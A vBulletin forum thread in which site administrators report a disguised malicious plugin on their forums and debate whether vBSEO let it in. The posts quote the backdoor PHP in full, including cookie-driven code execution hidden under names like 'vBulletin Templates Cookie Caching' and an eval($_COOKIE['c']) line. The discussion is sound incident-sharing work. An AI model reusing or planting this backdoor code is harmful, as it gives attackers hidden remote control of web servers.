Announcement

Collapse
No announcement yet.

Possible Exploit

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Jafo
    replied
    Ace, sorry, I disagree. They somehow are attacking the title replace feature to INJECT code. It IS a vbseo hole.. We are narrowing it down...

    Leave a comment:


  • Ace
    replied
    If this is the exploit that causes Google searches to redirect elsewhere (a-la filestore.info), the reason vBSEO gets targeted is because it's designed to increase search engine crawling.

    How they got in is not a vBSEO hole, but more than likely, people not securing all of the writable directories that vBulletin has to offer.

    Leave a comment:


  • DigitalCrowd
    replied
    I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:

    eval($_COOKIE['c']);

    Here is a site that references a PHP compromise with similar code...

    http://translate.google.com/translat...26prmd%3Dimvns

    Leave a comment:


  • Jafo
    replied
    Just confirmed with 3 other peers in the field. All with vbseo.. People, check your plugins!

    Leave a comment:


  • Jafo
    replied
    Yes I have, and pointed them to this thread..

    Leave a comment:


  • BirdOPrey5
    replied
    Have you notified VBSEO?

    Leave a comment:


  • Jafo
    replied
    Just got confirmation from a peer that it is on their system too.. The only common thread we have right now is vbseo..

    Leave a comment:


  • Jafo
    replied
    I just found it on a latest version of vb 4 too..

    Leave a comment:


  • Jafo
    replied
    I have just checked a site of ours without vbseo, no exploit. I then checked a personal site of mine that has nothing to do with the other sites and it has vbseo.. The exploit was there. Not a 100% confirmation by any means, just so far out of 20 something sites that I have checked, the one that doesn't have vbseo is not infected. I have quite a few more to check.

    Leave a comment:


  • Jafo
    replied
    Actually I more... This one in the same hook location, different site:

    Code:
    /* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
    I also saw this code:

    Code:
    /* vBulletin Dynamic Menu Filters */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);

    Leave a comment:


  • Jafo
    started a topic Possible Exploit

    Possible Exploit

    I noticed this plugin in global complete on several of our sites:

    PHP Code:
    /* vBulletin Templates Cookie Caching */
    $vbr="ujhdfgyj";$vbh="6a234a2a6b89b531b6720b9f86f42d7f";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 
    I googled the phrase "vBulletin Templates Cookie Caching" and see someone else noticed it yesterday too:

    http://www.vbsoporte.com/f29/posible...oso-foro-2866/

    All of our installs are running the latest version 3.8.7 PL2. I am going to all the sites and am disabling it as I find them. I have no idea if this is a VB exploit, or vbseo, or any other product we may have installed, but I suggest everyone check their plugin list.. This is installed under the vbulletin product, so it should be right around the top of the list. Still investigating..
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X